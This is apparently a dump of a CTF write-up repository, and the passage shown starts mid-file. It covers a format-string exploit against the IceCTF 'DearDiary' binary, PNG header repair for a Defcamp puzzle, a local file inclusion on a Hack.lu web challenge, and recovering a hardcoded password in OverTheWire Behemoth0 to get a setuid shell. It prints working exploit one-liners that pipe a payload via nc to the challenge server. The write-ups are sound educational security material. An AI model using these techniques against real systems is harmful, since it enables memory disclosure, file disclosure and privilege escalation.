quit 67 | > AAAAf75df7b6.f7753000.ff8cab88.ff8cbf88.00000000.0000000a.ea2b0000.00000000.00000000.ff8cbf98.0804888c.ff8cab88.00000004.f7753c20.00000000.00000000.00000001.41414141.78383025.3830252e. 68 | 69 | 1. add entry 70 | 2. print latest entry 71 | 3. quit 72 | ``` 73 | 74 | There we go, it looks as if our input was read back off the stack in the 18th position. Now we need to figure out what we can do. Let's take a look at the binary and see if there is a good memory location to mess with. 75 | 76 | ```asm 77 | flag: 78 | 0804863d push ebp ; XREF=main+27 79 | 0804863e mov ebp, esp 80 | 08048640 sub esp, 0x28 81 | 08048643 mov eax, dword [gs:0x14] 82 | 08048649 mov dword [ss:ebp+var_C], eax 83 | 0804864c xor eax, eax 84 | 0804864e mov dword [ss:esp+0x28+var_24], 0x0 ; argument "oflag" for method j_open 85 | 08048656 mov dword [ss:esp+0x28+var_28], 0x8048940 ; "./flag.txt", argument "path" for method j_open 86 | 0804865d call j_open 87 | 08048662 mov dword [ss:ebp+var_10], eax 88 | 08048665 mov dword [ss:esp+0x28+var_20], 0x100 ; argument "nbyte" for method j_read 89 | 0804866d mov dword [ss:esp+0x28+var_24], 0x804a0a0 ; argument "buf" for method j_read 90 | 08048675 mov eax, dword [ss:ebp+var_10] 91 | 08048678 mov dword [ss:esp+0x28+var_28], eax ; argument "fildes" for method j_read 92 | 0804867b call j_read 93 | 08048680 mov eax, dword [ss:ebp+var_C] 94 | 08048683 xor eax, dword [gs:0x14] 95 | 0804868a je 0x8048691 96 | 97 | 0804868c call j___stack_chk_fail 98 | 99 | 08048691 leave ; XREF=flag+77 100 | 08048692 ret 101 | ; endp 102 | ``` 103 | 104 | It looks as though the flag is on the server and being read in and saved into a buffer at ```0x804a0a0```. There is a good paper on [exploiting format string vulnerabilities](https://crypto.stanford.edu/cs155/papers/formatstring-1.2.pdf) that has a section dedicated to viewing memory at an arbitrary location. Let's try to implement that. 
105 | 106 | ``` 107 | root@kali:~# python -c 'print "1\n\xa0\xa0\x04\x08"+"%08x."*17+"%s\n2\n3\n"'| ./deardiary 108 | -- Diary 3000 -- 109 | 110 | 1. add entry 111 | 2. print latest entry 112 | 3. quit 113 | > Tell me all your secrets: 114 | 1. add entry 115 | 2. print latest entry 116 | 3. quit 117 | > ��f763d7b6.f77b1000.ffdca6b8.ffdcbab8.00000000.0000000a.43679600.00000000.00000000.ffdcbac8.0804888c.ffdca6b8.00000004.f77b1c20.00000000.00000000.00000001.Local FLAG 118 | 119 | 120 | 1. add entry 121 | 2. print latest entry 122 | 3. quit 123 | ``` 124 | 125 | Running it locally gives us a test flag that we set up, so we should be able to go straight to the server and get the flag. To be clear about why this works: the four address bytes sit at the very start of our entry, which the earlier dump showed is the 18th dword ```printf``` reaches on the stack; the seventeen ```%08x.``` specifiers consume dwords 1-17 and the ```%s``` is then applied to our address, printing whatever is stored at ```0x804a0a0```. glibc also supports direct parameter access, so ```%18$s``` straight after the address would do the same job with a much shorter payload. The fixed ```0x0804xxxx``` addresses in the disassembly also tell us the binary is not position independent, which is what lets us hard-code the buffer address at all. 126 | 127 | ``` 128 | root@kali:~# python -c 'print "1\n\xa0\xa0\x04\x08"+"%08x."*17+"%s\n2\n3\n"'| nc diary.vuln.icec.tf 6501 129 | -- Diary 3000 -- 130 | 131 | 1. add entry 132 | 2. print latest entry 133 | 3. quit 134 | > Tell me all your secrets: 135 | 1. add entry 136 | 2. print latest entry 137 | 3. quit 138 | > ��f7e57836.f7fce000.ffffc898.ffffdc98.00000000.0000000a.3ab59b00.00000000.00000000.ffffdca8.0804888c.ffffc898.00000004.f7fcec20.00000000.00000000.00000001.IceCTF{this_thing_is_just_sitting_here} 139 | 140 | 141 | 1. add entry 142 | 2. print latest entry 143 | 3. quit 144 | ``` 145 | 146 | Perfect, our flag is ```IceCTF{this_thing_is_just_sitting_here}```. 
147 | -------------------------------------------------------------------------------- /2016/IceCTF/Stage_2/DearDiary/deardiary: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2016/IceCTF/Stage_2/DearDiary/deardiary -------------------------------------------------------------------------------- /Misc/Defcamp CTF 2015/Misc/She said it doesn't matter/Images/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/Misc/Defcamp CTF 2015/Misc/She said it doesn't matter/Images/flag.png -------------------------------------------------------------------------------- /Misc/Defcamp CTF 2015/Misc/She said it doesn't matter/Images/flag_color.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/Misc/Defcamp CTF 2015/Misc/She said it doesn't matter/Images/flag_color.png -------------------------------------------------------------------------------- /Misc/Defcamp CTF 2015/Misc/She said it doesn't matter/Images/m100.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/Misc/Defcamp CTF 2015/Misc/She said it doesn't matter/Images/m100.png -------------------------------------------------------------------------------- /Misc/Defcamp CTF 2015/Misc/She said it doesn't matter/Images/m101.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/Misc/Defcamp CTF 2015/Misc/She said it doesn't matter/Images/m101.png 
-------------------------------------------------------------------------------- /Misc/Defcamp CTF 2015/Misc/She said it doesn't matter/Images/m102.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/Misc/Defcamp CTF 2015/Misc/She said it doesn't matter/Images/m102.png -------------------------------------------------------------------------------- /Misc/Defcamp CTF 2015/Misc/She said it doesn't matter/Images/m102.png.0005.IDAT: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/Misc/Defcamp CTF 2015/Misc/She said it doesn't matter/Images/m102.png.0005.IDAT -------------------------------------------------------------------------------- /Misc/Defcamp CTF 2015/Misc/She said it doesn't matter/Readme.md: -------------------------------------------------------------------------------- 1 | #She said it doesn't matter 2 | 3 | **Category:** Misc 4 | **Points:** 100 5 | **Description:** 6 | 7 | N/A 8 | 9 | ##Write-up 10 | 11 | We are given an image ([m100.png](./Images/m100.png)) that initially won't open. A quick run through ```pngcheck``` shows the following: 12 | 13 | ``` 14 | # pngcheck m100.png 15 | m100.png CRC error in chunk IHDR (computed 3ff4fc62, expected 35468913) 16 | ERROR: m100.png 17 | ``` 18 | 19 | Ok, that's easy enough to fix. Let's grab [pngcsum](http://schaik.com/png/pngcsum.html) and generate a new file. 20 | 21 | ``` 22 | # ~/pngcsum m100.png m101.png 23 | IHDR ( 13 ) - csum = 35468913 -> 3ff4fc62 24 | gAMA ( 4 ) - csum = 0bfc6105 25 | pHYs ( 9 ) - csum = 952b0e1b 26 | tEXt ( 25 ) - csum = 71c9653c 27 | IDAT (65010 ) - csum = 629a9431 28 | IEND ( 0 ) - csum = ae426082 29 | ``` 30 | 31 | This gives us a valid png file, which reveals the following image. 
32 | 33 | ![Fixed CRC error](./Images/m101.png) 34 | 35 | Since size matters, per the name of the challenge, let's start messing with the dimensions of this file. Per the [PNG specifications](http://www.w3.org/TR/PNG/#11IHDR), the width and height should be the 8 bytes after the ```IHDR``` header. Opening up the file with ```hexeditor``` reveals the header and current dimensions. 36 | 37 | ``` 38 | File: m101.png ASCII Offset: 0x00000000 / 0x0000FE74 (%00) 39 | 00000000 89 50 4E 47 0D 0A 1A 0A 00 00 00 0D 49 48 44 52 .PNG........IHDR 40 | 00000010 00 00 02 9A 00 00 02 07 08 06 00 00 00 3F F4 FC .............?.. 41 | 00000020 62 00 00 00 04 67 41 4D 41 00 00 B1 8F 0B FC 61 b....gAMA......a 42 | 00000030 05 00 00 00 09 70 48 59 73 00 00 0E C4 00 00 0E .....pHYs....... 43 | 00000040 C4 01 95 2B 0E 1B 00 00 00 19 74 45 58 74 53 6F ...+......tEXtSo 44 | 00000050 66 74 77 61 72 65 00 41 64 6F 62 65 20 49 6D 61 ftware.Adobe Ima 45 | 00000060 67 65 52 65 61 64 79 71 C9 65 3C 00 00 FD F2 49 geReadyq.e<....I 46 | 00000070 44 41 54 78 5E EC FD E5 97 6B E7 BD E6 FD 9E FF DATx^....k...... 47 | 00000080 E8 39 FD 74 EF DE 3B 7B 87 9D 6C 3B 8E 63 C7 BC .9.t..;{..l;.c.. 48 | 00000090 18 8A 99 99 59 05 2A 61 49 C5 4C 62 66 28 66 58 ....Y.*aI.Lbf(fX 49 | 000000A0 4C C6 C4 61 D8 61 C7 4E 76 E0 3A BF 39 B3 5E 9C L..a.a.Nv.:.9.^. 50 | 000000B0 71 46 9F D1 FD 74 7B 06 AF 8F C7 1C 52 A9 A4 A9 qF...t{.....R... 51 | 000000C0 29 AD 7A F1 B5 A6 EE FB FE 7F 81 88 88 88 88 48 ).z............H 52 | 000000D0 43 0C 4E 22 22 22 22 D2 14 83 93 88 88 88 88 34 C.N""""........4 53 | 000000E0 C5 E0 24 22 22 22 22 4D 31 38 89 88 88 88 48 53 ..$""""M18....HS 54 | 000000F0 0C 4E 22 22 22 22 D2 14 83 93 88 88 88 88 34 C5 .N""""........4. 55 | 00000100 E0 24 22 22 22 22 4D 31 38 89 88 88 88 48 53 0C .$""""M18....HS. 56 | 00000110 4E 22 22 22 22 D2 14 83 93 88 88 88 88 34 C5 E0 N""""........4.. 
57 | 00000120 24 22 22 22 22 4D 31 38 89 88 88 88 48 53 0C 4E $""""M18....HS.N 58 | 00000130 22 22 22 22 D2 14 83 93 88 88 88 88 34 C5 E0 24 """"........4..$ 59 | 00000140 22 22 22 22 4D 31 38 89 88 88 88 48 53 0C 4E 22 """"M18....HS.N" 60 | 00000150 22 22 22 D2 14 83 93 88 88 88 88 34 C5 E0 24 22 """........4..$" 61 | ``` 62 | 63 | We can focus on the following values: 64 | 65 | ``` 66 | 00 00 02 9A 00 00 02 07 67 | ``` 68 | 69 | The current values make a ```666 x 519``` image (the ```08 06``` that follows them is bit depth 8 and colour type 6, i.e. 8-bit RGBA, which matters later when we reinterpret the raw pixel data). We can edit the height and make a square image to start. The values should change to: 70 | 71 | ``` 72 | 00 00 02 9A 00 00 02 9A 73 | ``` 74 | 75 | Changing the file messes up our CRC again, so we need to rerun the new file through [pngcsum](http://schaik.com/png/pngcsum.html) and we are given our new image. 76 | 77 | ``` 78 | # ~/pngcsum m101.png m102.png 79 | IHDR ( 13 ) - csum = 3ff4fc62 -> 9e0cf9ff 80 | gAMA ( 4 ) - csum = 0bfc6105 81 | pHYs ( 9 ) - csum = 952b0e1b 82 | tEXt ( 25 ) - csum = 71c9653c 83 | IDAT (65010 ) - csum = 629a9431 84 | IEND ( 0 ) - csum = ae426082 85 | ``` 86 | 87 | Note that only the ```IHDR``` checksum changed; the compressed pixel data is untouched and we are merely changing how the decoder lays it out. ![Square image](./Images/m102.png) 88 | 89 | At this point the flag is visible ```s1z3_d03s_ma773r_baby```, but pretty hard to read. We can stop here, but there was an intriguing writeup by [p4](https://github.com/p4-team/ctf/tree/master/2015-10-02-dctf/misc_100_doesnt_matter) that I wanted to explore. After a quick read of their writeup and some referencing back to the [PNG specifications](http://www.w3.org/TR/PNG) I decided that I wanted to try to duplicate the results using python to pull the raw pixel data out of the png and redisplay it with [PIL](http://pillow.readthedocs.org/en/3.0.x/handbook/overview.html). However, the [p4](https://github.com/p4-team/ctf/tree/master/2015-10-02-dctf/misc_100_doesnt_matter) writeup jumps past a lot of data so I was left with a lot of reading and setup before I could attempt any python. 
90 | 91 | To start, let's talk about how pixels are stored within a PNG. A quick read of documentation, or google searching, will reveal that the pixels are stored in the [IDAT](http://www.w3.org/TR/PNG/#11IDAT) section of the file, and further reading will show that this data is [compressed](http://www.w3.org/TR/PNG/#10Compression) with zlib (the only compression method the spec currently defines). If we glance back up to the ```hexeditor``` data we can see that the ```IDAT``` header is immediately followed by ```78 5E```, with the ```78``` standing out as a common [magic number](https://en.wikipedia.org/wiki/Magic_number_(programming)) for the first byte of a ```zlib``` header. 92 | 93 | ``` 94 | 00000060 67 65 52 65 61 64 79 71 C9 65 3C 00 00 FD F2 49 geReadyq.e<....I 95 | 00000070 44 41 54 78 5E EC FD E5 97 6B E7 BD E6 FD 9E FF DATx^....k...... 96 | ``` 97 | 98 | This means we should be able to extract the ```zlib``` compressed data and decompress it with python, which would leave us with the raw image data. To isolate the compressed data I used ```pngsplit``` to separate the different sections of the file. 99 | 100 | ``` 101 | # pngsplit m102.png 102 | pngsplit, version 0.60 BETA of 11 February 2007, by Greg Roelofs. 103 | This software is licensed under the GNU General Public License. 104 | There is NO warranty. 105 | 106 | m102.png: 107 | # ls 108 | m100.png m102.png.0000.sig m102.png.0003.pHYs m102.png.0006.IEND 109 | m101.png m102.png.0001.IHDR m102.png.0004.tEXt 110 | m102.png m102.png.0002.gAMA m102.png.0005.IDAT 111 | ``` 112 | 113 | Now that we have the ```IDAT``` section isolated we need to ensure that we strip off the fluff at the beginning and start directly with the ```zlib``` header. Looking at the beginning of the file we see: 114 | 115 | ``` 116 | 00 00 FD F2 49 44 41 54 78 5E EC FD E5 97 6B E7 117 | ``` 118 | 119 | Therefore we need to delete the first 8 bytes of this file (the 4-byte chunk length and the 4-byte ```IDAT``` type), which can be done with the editor of your choice; the chunk's trailing 4-byte CRC can stay, since Python's ```zlib.decompress``` stops at the end of the zlib stream and ignores what follows. 
You should be left with a file similar to [m102.png.0005.IDAT](./Images/m102.png.0005.IDAT). Once we have the ```zlib``` compressed data we can finally put python to use. 120 | 121 | We can decompress the data with: 122 | 123 | ```python 124 | raw = open('m102.png.0005.IDAT','rb').read() 125 | data = zlib.decompress(raw) 126 | ``` 127 | 128 | and then configure and save the raw data with: 129 | 130 | ```python 131 | im = Image.frombytes('RGB',(891,550),data) 132 | im.save('flag.png') 133 | ``` 134 | 135 | To get the correct ```mode``` and ```size``` for the ```Image.frombytes``` call takes some brute forcing, but in the end you should land on an image similar to this. The numbers are not arbitrary, though: in a PNG the decompressed data is, for each scanline, one filter-type byte followed by the (filtered) pixel bytes, and the ```IHDR``` says 8-bit RGBA, so once we know the true width is 668 (see below) the real row stride is 668 × 4 + 1 = 2673 bytes — exactly 891 × 3. Reading the data as 891-wide RGB therefore keeps every row aligned, just with the filter byte and alpha channel shuffled into the colour channels, which is why the colours are off. It only comes out this clean because the rows presumably all use filter type 0 (None); with any other filter the rows would have to be unfiltered before being displayed. 136 | 137 | ![PIL](./Images/flag.png) 138 | 139 | The full script used was: 140 | 141 | ```python 142 | import zlib 143 | from PIL import Image 144 | 145 | raw = open('m102.png.0005.IDAT','rb').read() 146 | data = zlib.decompress(raw) 147 | im = Image.frombytes('RGB',(891,550),data) 148 | im.save('flag.png') 149 | ``` 150 | 151 | Why stop here though? There is more fun to be had. Now that we actually have the correct image, we still want to see it in its full color. Turning back to our original method of just editing the ```IHDR``` header we end up running across a ```668 x 668``` dimension which yields: 152 | 153 | ![Full color](./Images/flag_color.png) 154 | 155 | In the end, all we needed to do was find the correct dimension with the ```IHDR``` header, but I saw some value in being able to pull the raw data out of the image and do our brute forcing within the python script (hopefully it will help us in future challenges). 
156 | -------------------------------------------------------------------------------- /Misc/Hack.lu-CTF-2015/Web/Module Loader/Images/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/Misc/Hack.lu-CTF-2015/Web/Module Loader/Images/flag.png -------------------------------------------------------------------------------- /Misc/Hack.lu-CTF-2015/Web/Module Loader/Images/hidden.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/Misc/Hack.lu-CTF-2015/Web/Module Loader/Images/hidden.png -------------------------------------------------------------------------------- /Misc/Hack.lu-CTF-2015/Web/Module Loader/Images/htaccess.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/Misc/Hack.lu-CTF-2015/Web/Module Loader/Images/htaccess.png -------------------------------------------------------------------------------- /Misc/Hack.lu-CTF-2015/Web/Module Loader/Images/lfi.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/Misc/Hack.lu-CTF-2015/Web/Module Loader/Images/lfi.png -------------------------------------------------------------------------------- /Misc/Hack.lu-CTF-2015/Web/Module Loader/Images/main.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/Misc/Hack.lu-CTF-2015/Web/Module Loader/Images/main.png -------------------------------------------------------------------------------- 
/Misc/Hack.lu-CTF-2015/Web/Module Loader/Images/modules.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/Misc/Hack.lu-CTF-2015/Web/Module Loader/Images/modules.png -------------------------------------------------------------------------------- /Misc/Hack.lu-CTF-2015/Web/Module Loader/Images/notthateasy.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/Misc/Hack.lu-CTF-2015/Web/Module Loader/Images/notthateasy.png -------------------------------------------------------------------------------- /Misc/Hack.lu-CTF-2015/Web/Module Loader/Readme.md: -------------------------------------------------------------------------------- 1 | #Module Loader 2 | 3 | **Category:** Web 4 | **Points:** 100 5 | **Description:** 6 | 7 | Since his students never know what date it is and how much time they have until the next homework's deadline, Mr P. H. Porter wrote a little webapp for that. 8 | 9 | https://school.fluxfingers.net:1522/ 10 | 11 | ##Write-up 12 | 13 | We are presented with a site that has two links, one to get the current date and one to calculate time based off of a parameter. 14 | 15 | ![Main](./Images/main.png) 16 | 17 | Viewing the source reveals a comment at the top that tells us that all of the modules are in the modules directory. Going there reveals: 18 | 19 | ![Modules](./Images/modules.png) 20 | 21 | This gives us the php code for the two pages. Since we know the modules are one level up and they are php, let's go back and try to include index.php itself in the main page. 22 | 23 | ![lfi](./Images/lfi.png) 24 | 25 | Ok, we are looking at a basic local file inclusion: the module name is evidently handed straight to a PHP include without being confined to the modules directory, so a relative path walks out of it and pulls in any file the web server can read (PHP files get executed, anything else is echoed back as text). Let's see what other files we can find. 
26 | 27 | ![htaccess](./Images/htaccess.png) 28 | 29 | .htaccess returns something different. Looking at the source there is a directory with indexing turned on. Let's see if we can get there. 30 | 31 | ![hidden](./Images/hidden.png) 32 | 33 | Ah, ```flag.php```. Let's see what it is. 34 | 35 | ![Not that easy](./Images/notthateasy.png) 36 | 37 | Well, not quite what we wanted. Let's go back to the main page and include ```flag.php``` with its path as the module. 38 | 39 | ![flag](./Images/flag.png) 40 | 41 | ```flag{hidden_is_not_actually_hidden}``` 42 | -------------------------------------------------------------------------------- /Misc/OverTheWire/Behemoth/Behemoth0/Readme.md: -------------------------------------------------------------------------------- 1 | #Behemoth0 2 | 3 | behemoth.labs.overthewire.org 4 | 5 | **Username:** behemoth0 6 | **Password:** behemoth0 7 | **Description:** 8 | 9 | This wargame deals with a lot of regular vulnerabilities found commonly 'out in the wild'. While the game makes no attempts at emulating a real environment it will teach you how to exploit several of the most common coding mistakes including buffer overflows, race conditions and privilege escalation. 10 | 11 | ##Write-up 12 | 13 | Let's go ahead and see what we're working with: 14 | 15 | ``` 16 | # file behemoth0 17 | behemoth0: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=4c2e0281c9220ac21b55994f2a2408fe3c6693ac, not stripped 18 | ``` 19 | 20 | Ok, nothing special yet, pretty much what we were used to with [narnia](https://github.com/Alpackers/CTF-Writeups/tree/master/Misc/OverTheWire/Narnia) challenges (the ```setuid``` in the ```file``` output is the whole point, though: whatever this binary executes runs as the next level's user). Having been frustrated recently with some security protections I figured I would go ahead and see what was turned on. 
21 | 22 | ``` 23 | # ~/checksec.sh --file behemoth0 24 | RELRO STACK CANARY NX PIE RPATH RUNPATH FILE 25 | No RELRO Canary found NX enabled No PIE No RPATH No RUNPATH behemoth0 26 | ``` 27 | 28 | Looks like there is a ```canary``` and ```NX``` is turned on. We may or may not have to bypass them...time will tell. Now, just to run it and see what we're up against. 29 | 30 | ``` 31 | # ./behemoth0 32 | Password: AAAAAAAAA 33 | Access denied.. 34 | ``` 35 | 36 | Just from execution it looks like we probably just need to find the correct password. Let's go ahead and disassemble main and see what it looks like. 37 | 38 | ```asm 39 | main: 40 | 080485a2 push ebp ; XREF=_start+23 41 | 080485a3 mov ebp, esp 42 | 080485a5 and esp, 0xfffffff0 43 | 080485a8 sub esp, 0x70 44 | 080485ab mov eax, dword [gs:0x14] 45 | 080485b1 mov dword [ss:esp+0x6c], eax 46 | 080485b5 xor eax, eax 47 | 080485b7 mov dword [ss:esp+0x1f], 0x475e4b4f 48 | 080485bf mov dword [ss:esp+0x23], 0x45425953 49 | 080485c7 mov dword [ss:esp+0x27], 0x595e58 50 | 080485cf mov dword [ss:esp+0x10], 0x8048720 ; "unixisbetterthanwindows" 51 | 080485d7 mov dword [ss:esp+0x14], 0x8048738 ; "followthewhiterabbit" 52 | 080485df mov dword [ss:esp+0x18], 0x804874d ; "pacmanishighoncrack" 53 | 080485e7 mov dword [ss:esp], 0x8048761 ; "Password: ", argument "format" for method j_printf 54 | 080485ee call j_printf 55 | 080485f3 lea eax, dword [ss:esp+0x2b] 56 | 080485f7 mov dword [ss:esp+0x4], eax 57 | 080485fb mov dword [ss:esp], 0x804876c 58 | 08048602 call j___isoc99_scanf 59 | 08048607 lea eax, dword [ss:esp+0x1f] 60 | 0804860b mov dword [ss:esp], eax ; argument "s" for method j_strlen 61 | 0804860e call j_strlen 62 | 08048613 mov dword [ss:esp+0x4], eax ; argument #2 for method memfrob 63 | 08048617 lea eax, dword [ss:esp+0x1f] 64 | 0804861b mov dword [ss:esp], eax ; argument #1 for method memfrob 65 | 0804861e call memfrob 66 | 08048623 lea eax, dword [ss:esp+0x1f] 67 | 08048627 mov dword [ss:esp+0x4], eax ; argument 
"s2" for method j_strcmp 68 | 0804862b lea eax, dword [ss:esp+0x2b] 69 | 0804862f mov dword [ss:esp], eax ; argument "s1" for method j_strcmp 70 | 08048632 call j_strcmp 71 | 08048637 test eax, eax 72 | 08048639 jne 0x8048665 73 | 74 | 0804863b mov dword [ss:esp], 0x8048771 ; "Access granted..", argument "s" for method j_puts 75 | 08048642 call j_puts 76 | 08048647 mov dword [ss:esp+0x8], 0x0 77 | 0804864f mov dword [ss:esp+0x4], 0x8048782 ; argument "arg0" for method j_execl 78 | 08048657 mov dword [ss:esp], 0x8048785 ; argument "path" for method j_execl 79 | 0804865e call j_execl 80 | 08048663 jmp 0x8048671 81 | 82 | 08048665 mov dword [ss:esp], 0x804878d ; "Access denied..", argument "s" for method j_puts, XREF=main+151 83 | 0804866c call j_puts 84 | 85 | 08048671 mov eax, 0x0 ; XREF=main+193 86 | 08048676 mov edx, dword [ss:esp+0x6c] 87 | 0804867a xor edx, dword [gs:0x14] 88 | 08048681 je 0x8048688 89 | 90 | 08048683 call j___stack_chk_fail 91 | 92 | 08048688 leave ; XREF=main+223 93 | 08048689 ret 94 | ; endp 95 | ``` 96 | 97 | I saw a few strings at the top of main that looked like they may be passwords. Let's give them a shot. 98 | 99 | ``` 100 | # ./behemoth0 101 | Password: unixisbetterthanwindows 102 | Access denied.. 103 | # ./behemoth0 104 | Password: followthewhiterabbit 105 | Access denied.. 106 | # ./behemoth0 107 | Password: pacmanishighoncrack 108 | Access denied.. 109 | ``` 110 | 111 | Well, worth a shot anyway. Now let's acutally do some digging. Looks like a string comparison is what determines if we have the correct password or not. We should be able to set a breakpoint in ```gdb``` and see what's on the stack right at the call to ```j_strcmp```. This is similiar to the type of logic in a few of the [microcorruption](https://microcorruption.com/login) challenges. 
112 | 113 | ```asm 114 | 08048627 mov dword [ss:esp+0x4], eax ; argument "s2" for method j_strcmp 115 | 0804862b lea eax, dword [ss:esp+0x2b] 116 | 0804862f mov dword [ss:esp], eax ; argument "s1" for method j_strcmp 117 | 08048632 call j_strcmp 118 | 08048637 test eax, eax 119 | 08048639 jne 0x8048665 120 | ``` 121 | 122 | ``` 123 | (gdb) break * 0x08048632 124 | Breakpoint 1 at 0x8048632 125 | (gdb) run 126 | Starting program: /root/CTF/OverTheWire/behemoth/behemoth0 127 | Password: AAAAAAAAAA 128 | > 129 | Breakpoint 1, 0x08048632 in main () 130 | (gdb) x/50x $esp 131 | 0xffffd1e0: 0xffffd20b 0xffffd1ff 0xffffd200 0x080482d2 132 | 0xffffd1f0: 0x08048720 0x08048738 0x0804874d 0x65e9f586 133 | 0xffffd200: 0x796d7461 0x726f6873 0x41007374 0x41414141 134 | 0xffffd210: 0x41414141 0x00ca0041 0x00000001 0x080483c5 135 | 0xffffd220: 0xffffd46d 0x0000002f 0x0804999c 0x080486e2 136 | 0xffffd230: 0x00000001 0xffffd2f4 0xffffd2fc 0xf7e3c39d 137 | 0xffffd240: 0xf7fb13c4 0xf7ffd000 0x0804869b 0xfd956100 138 | 0xffffd250: 0x08048690 0x00000000 0x00000000 0xf7e24a63 139 | 0xffffd260: 0x00000001 0xffffd2f4 0xffffd2fc 0xf7feb7da 140 | 0xffffd270: 0x00000001 0xffffd2f4 0xffffd294 0x080499c0 141 | 0xffffd280: 0x08048270 0xf7fb1000 0x00000000 0x00000000 142 | 0xffffd290: 0x00000000 0x8e3b8a48 0xb50b0e58 0x00000000 143 | 0xffffd2a0: 0x00000000 0x00000000 144 | ``` 145 | 146 | Ok, here we are. We can clearly see our input on the stack in the form of ```0x41414141```, but nothing else really stands out in this format. When I'm expecting a string I like to use ```xxd``` to view to stack, so let's go ahead and set that up and see what we get. 147 | 148 | ``` 149 | (gdb) define xxd 150 | Type commands for definition of "xxd". 151 | End with a line saying just "end". 152 | >dump binary memory dump.bin $arg0 $arg0+$arg1 153 | >shell xxd dump.bin 154 | >end 155 | (gdb) xxd $esp 100 156 | 0000000: 0bd2 ffff ffd1 ffff 00d2 ffff d282 0408 ................ 
157 | 0000010: 2087 0408 3887 0408 4d87 0408 86f5 e965 ...8...M......e 158 | 0000020: 6174 6d79 7368 6f72 7473 0041 4141 4141 atmyshorts.AAAAA 159 | 0000030: 4141 4141 4100 ca00 0100 0000 c583 0408 AAAAA........... 160 | 0000040: 6dd4 ffff 2f00 0000 9c99 0408 e286 0408 m.../........... 161 | 0000050: 0100 0000 f4d2 ffff fcd2 ffff 9dc3 e3f7 ................ 162 | 0000060: c413 fbf7 .... 163 | (gdb) 164 | ``` 165 | 166 | Ok, now that appears pretty clear. We can see the string ```eatmyshorts``` directly before our input. Now to try it. 167 | 168 | ``` 169 | # ./behemoth0 170 | Password: eatmyshorts 171 | Access granted.. 172 | # exit 173 | ``` 174 | 175 | Perfect. This was local, so let's head to the server and try it out. 176 | 177 | ``` 178 | behemoth0@melinda:/behemoth$ ./behemoth0 179 | Password: eatmyshorts 180 | Access granted.. 181 | $ whoami 182 | behemoth1 183 | $ cat /etc/behemoth_pass/behemoth1 184 | ********** 185 | $ 186 | ``` 187 | 188 | That was pretty easy, but a nice change of pace from the last two [narnia](https://github.com/Alpackers/CTF-Writeups/tree/master/Misc/OverTheWire/Narnia) challenges that were pretty challenging to me. On to behemoth1. 
189 | -------------------------------------------------------------------------------- /Misc/OverTheWire/Behemoth/Behemoth0/behemoth0: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/Misc/OverTheWire/Behemoth/Behemoth0/behemoth0 -------------------------------------------------------------------------------- /Misc/OverTheWire/Behemoth/Behemoth1/Readme.md: -------------------------------------------------------------------------------- 1 | #Behemoth1 2 | 3 | behemoth.labs.overthewire.org 4 | 5 | **Username:** behemoth1 6 | **Password:** see [behemoth0](https://github.com/Alpackers/CTF-Writeups/tree/master/Misc/OverTheWire/Behemoth/Behemoth0) 7 | **Description:** 8 | 9 | This wargame deals with a lot of regular vulnerabilities found commonly 'out in the wild'. While the game makes no attempts at emulating a real environment it will teach you how to exploit several of the most common coding mistakes including buffer overflows, race conditions and privilege escalation. 10 | 11 | ##Write-up 12 | 13 | Let's go ahead and see what we're working with: 14 | 15 | ``` 16 | # file behemoth1 17 | behemoth1: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=6b301db8057be8df8ceead844e81f05764289f92, not stripped 18 | ``` 19 | ``` 20 | # ~/checksec.sh --file behemoth1 21 | RELRO STACK CANARY NX PIE RPATH RUNPATH FILE 22 | No RELRO No canary found NX disabled No PIE No RPATH No RUNPATH behemoth1 23 | ``` 24 | 25 | The binary is pretty much the same and we know that there are no security features enabled. Let's look at the execution. 26 | 27 | ``` 28 | # ./behemoth1 29 | Password: AAAAAAAAAA 30 | Authentication failure. 31 | Sorry. 
